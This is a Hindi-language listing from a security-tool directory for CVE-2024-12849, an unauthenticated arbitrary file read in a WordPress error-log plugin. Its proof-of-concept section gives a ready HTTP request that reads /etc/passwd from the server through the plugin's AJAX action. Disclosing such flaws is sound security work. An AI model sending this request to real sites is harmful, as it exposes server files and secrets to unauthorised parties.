Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12849 — Error Log Viewer By WP Guru <= 1.0.1.3 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ने हेतु प्राधिकरण की कमी | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-12849
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubrandomrobbiebf/cve-2024-12849

CVE-2024-12849

Error Log Viewer By WP Guru <= 1.0.1.3 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ने हेतु प्राधिकरण की कमी

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-12849

Error Log Viewer By WP Guru <= 1.0.1.3 - बिना प्रमाणीकरण के मनमाने फ़ाइल पठन के लिए लापता प्राधिकरण

विवरण

WordPress के लिए Error Log Viewer By WP Guru प्लगइन, 1.0.1.3 तक (1.0.1.3 सहित) सभी संस्करणों में wp_ajax_nopriv_elvwp_log_download AJAX एक्शन के माध्यम से मनमाने फ़ाइल पठन (Arbitrary File Read) की भेद्यता से ग्रस्त है। इससे बिना प्रमाणीकरण वाले हमलावरों के लिए सर्वर पर मौजूद मनमानी फ़ाइलों की सामग्री पढ़ना संभव हो जाता है, जिनमें संवेदनशील जानकारी हो सकती है।

विवरण

  • प्रकार: plugin
  • स्लग: error-log-viewer-wp
  • प्रभावित संस्करण: 1.0.1.3
  • CVSS स्कोर: 7.5
  • CVSS रेटिंग: High
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-12849
  • स्थिति: Active

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd
टूल डाउनलोड करें